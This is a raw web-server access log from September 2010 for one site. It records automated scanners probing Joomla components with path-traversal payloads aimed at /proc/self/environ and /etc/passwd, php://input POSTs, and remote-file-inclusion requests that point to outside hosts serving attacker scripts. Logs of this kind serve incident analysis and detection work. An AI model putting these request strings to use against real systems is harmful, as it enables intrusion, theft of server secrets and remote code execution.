74.52.119.106 - - [02/Sep/2010:09:50:58 -0700] "GET /index.php?option=com_joomlastats&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68515 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:50:59 -0700] "POST /index.php?option=com_joomlastats&task=php://input HTTP/1.1" 200 68396 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:51:04 -0700] "GET /index.php?option=com_joomlastats&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68433 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:51:04 -0700] "GET /logs/index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:51:04 -0700] "GET /logs/index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:51:05 -0700] "GET /logs/index.php?option=com_joomlastats&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:05 -0700] "GET /logs/access_080218.log/index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:51:05 -0700] "POST /logs/index.php?option=com_joomlastats&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:05 -0700] "GET /logs/access_080218.log/index.php?option=com_joomlastats&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:09:51:05 -0700] "GET /logs/index.php?option=com_joomlastats&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:51:05 -0700] "GET /logs/access_100702.log//index2.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:05 -0700] "POST /logs/access_080218.log/index.php?option=com_joomlastats&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:51:05 -0700] "GET /index2.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:51:05 -0700] "GET /logs//index2.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:51:08 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:08 -0700] "GET /logs/access_080218.log/index.php?option=com_joomlastats&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:51:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:09 -0700] "GET /index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 68495 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:10 -0700] "GET /index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68498 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:11 -0700] "GET /index.php?option=com_joomlastats&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68515 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:12 -0700] "POST /index.php?option=com_joomlastats&task=php://input HTTP/1.1" 200 68396 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:51:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:13 -0700] "GET /index.php?option=com_joomlastats&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68433 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:13 -0700] "GET /logs/index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:14 -0700] "GET /logs/index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:14 -0700] "GET /logs/index.php?option=com_joomlastats&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:14 -0700] "POST /logs/index.php?option=com_joomlastats&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:51:14 -0700] "GET /logs/index.php?option=com_joomlastats&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:09:52:08 -0700] "GET /logs/access_100606.log/index.php?strona=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.221 - - [02/Sep/2010:09:52:26 -0700] "GET /logs/access_100815.log/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.221 - - [02/Sep/2010:09:52:27 -0700] "GET /index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 68471 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.221 - - [02/Sep/2010:09:52:28 -0700] "GET /logs/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:46 -0700] "GET /logs/access_100325.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:48 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:49 -0700] "GET /logs/access_100325.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:51 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:57 -0700] "GET /logs/access_100524.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:52:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:53:06 -0700] "GET /logs/access_090508.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:53:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:53:08 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:53:08 -0700] "GET /logs/access_090508.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:54:40 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:54:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:54:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:55:09 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:09:55:19 -0700] "GET /?sourcedir=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 200 68557 "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:09:55:22 -0700] "GET /logs/access_080412.log/?sourcedir=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:09:55:22 -0700] "GET /logs/?sourcedir=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:55:29 -0700] "GET /logs/access_100824.log/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:55:31 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [02/Sep/2010:09:55:31 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:55:32 -0700] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:55:32 -0700] "GET /logs/access_100303.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:09:55:32 -0700] "GET /logs/access_100303.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:09:55:43 -0700] "GET /logs/access_080831.log/?sourcedir=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:09:55:45 -0700] "GET /logs/access_100211.log HTTP/1.0" 200 3684709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.150.221.114 - - [02/Sep/2010:09:56:02 -0700] "GET /admin.php?act=http://www.be-boost.fr//components/com_artforms/assets/captcha/includes/captchaform/give/id1??? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.dmulk.com"
202.150.221.114 - - [02/Sep/2010:09:56:13 -0700] "GET /logs/access_090102.log%20%20//admin.php?act=http://www.be-boost.fr//components/com_artforms/assets/captcha/includes/captchaform/give/id1??? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.dmulk.com"
202.150.221.114 - - [02/Sep/2010:09:56:13 -0700] "GET /logs//admin.php?act=http://www.be-boost.fr//components/com_artforms/assets/captcha/includes/captchaform/give/id1??? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.dmulk.com"
118.129.166.221 - - [02/Sep/2010:09:56:13 -0700] "GET /logs/access_100809.log/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.183.7 - - [02/Sep/2010:09:56:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
198.106.183.7 - - [02/Sep/2010:09:56:54 -0700] "POST /logs/access_100410.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
198.106.183.7 - - [02/Sep/2010:09:56:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:09:57:53 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:09:58:34 -0700] "GET /logs/access_080831.log%20%20/?sourcedir=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:09:58:36 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:09:58:37 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:09:58:41 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.810" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:09:58:45 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
207.46.13.50 - - [02/Sep/2010:09:58:52 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "dmulk.com"
89.200.170.145 - - [02/Sep/2010:09:58:54 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:09:59:10 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:09:59:11 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:09:59:14 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.810" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:09:59:15 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:09:59:38 -0700] "GET /logs/access_100824.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:09:59:38 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:09:59:40 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:00:02 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:00:18 -0700] "GET /logs/access_100824.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:00:19 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:00:20 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:00:43 -0700] "GET /logs/access_080213.log/index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:00:43 -0700] "GET /logs/access_080213.log/index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:00:47 -0700] "GET /logs/access_080213.log/index.php?option=com_joomlastats&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:00:47 -0700] "POST /logs/access_080213.log/index.php?option=com_joomlastats&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:00:47 -0700] "GET /logs/access_080213.log/index.php?option=com_joomlastats&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:00:55 -0700] "GET /logs/access_080213.log/index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:00:55 -0700] "GET /logs/access_080213.log/index.php?option=com_joomlastats&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:00:55 -0700] "GET /logs/access_080213.log/index.php?option=com_joomlastats&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:00:55 -0700] "POST /logs/access_080213.log/index.php?option=com_joomlastats&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:00:56 -0700] "GET /logs/access_080213.log/index.php?option=com_joomlastats&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:01:17 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:01:31 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.810" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:02:08 -0700] "GET /logs/access_100616.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:02:10 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:02:11 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:02:12 -0700] "GET /logs/access_100616.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:02:13 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:02:14 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:02:27 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:02:37 -0700] "GET /logs/access_100620.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:02:38 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:02:39 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:04:16 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:04:23 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:04:25 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:04:27 -0700] "GET /logs/access_091025.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
